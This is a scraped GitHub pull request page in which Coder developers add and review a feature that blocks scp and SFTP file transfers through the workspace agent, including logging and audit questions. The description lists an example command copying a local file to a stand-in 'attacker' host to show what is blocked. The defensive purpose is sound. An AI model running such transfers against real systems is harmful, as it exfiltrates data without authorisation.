- Notifications
You must be signed in to change notification settings - Fork1k
feat: block file transfers for security#13501
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to ourterms of service andprivacy statement. We’ll occasionally send you account related emails.
Already on GitHub?Sign in to your account
Uh oh!
There was an error while loading.Please reload this page.
Conversation
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others.Learn more.
Left some comments.
We probably also want some tests to validate that blocking file transfers does not block regular old SSH.
Uh oh!
There was an error while loading.Please reload this page.
| } | ||
| ifs.fileTransferBlocked(session) { | ||
| s.logger.Warn(ctx,"file transfer blocked",slog.F("session_subsystem",session.Subsystem()),slog.F("raw_command",session.RawCommand())) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others.Learn more.
out of scope: we may want to eventually have a way to surface this to admins as they may be interested in this sort of thing.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others.Learn more.
a new metric? maybe consider this as a follow-up option. I don't know if an admin wants to review notifications from users accidentally trying to usescp.
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
Uh oh!
There was an error while loading.Please reload this page.
| } | ||
| ifs.fileTransferBlocked(session) { | ||
| s.logger.Warn(ctx,"file transfer blocked",slog.F("session_subsystem",session.Subsystem()),slog.F("raw_command",session.RawCommand())) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others.Learn more.
Do we run the risk here of logging a potentially large amount of text here?
Should we try and capture the user identity associated with this attempt, too?
Aside: this feels like a good use-case for an audit-log.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others.Learn more.
Same as#13501 (comment)?
Yeah, the problem here is that it is logged on the agent side in/tmp/coder.blahblah/coder-agent-<some-file>.log, and it is not raised to admins. We may want to think about some metrics to notify them.
Uh oh!
There was an error while loading.Please reload this page.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others.Learn more.
LGTM, mostly nits
Uh oh!
There was an error while loading.Please reload this page.
Related:#13383
This PR adds logic to conditionally block file transfers via Coder agent.
How to use it:
These cases are covered:
ssh coder.workspace-17.main scp localfile remote.host.attacker:~scp 2.txt coder.workspace-17.main:~scp coder.workspace-17.main:~/1.txt /dev/nullOutputs -
As you can see, only in the first case, we can show an error message that something went wrong. In case of SFTP subsystem, we can just cut the connection.
Re 1:
Re 2:
Re 3: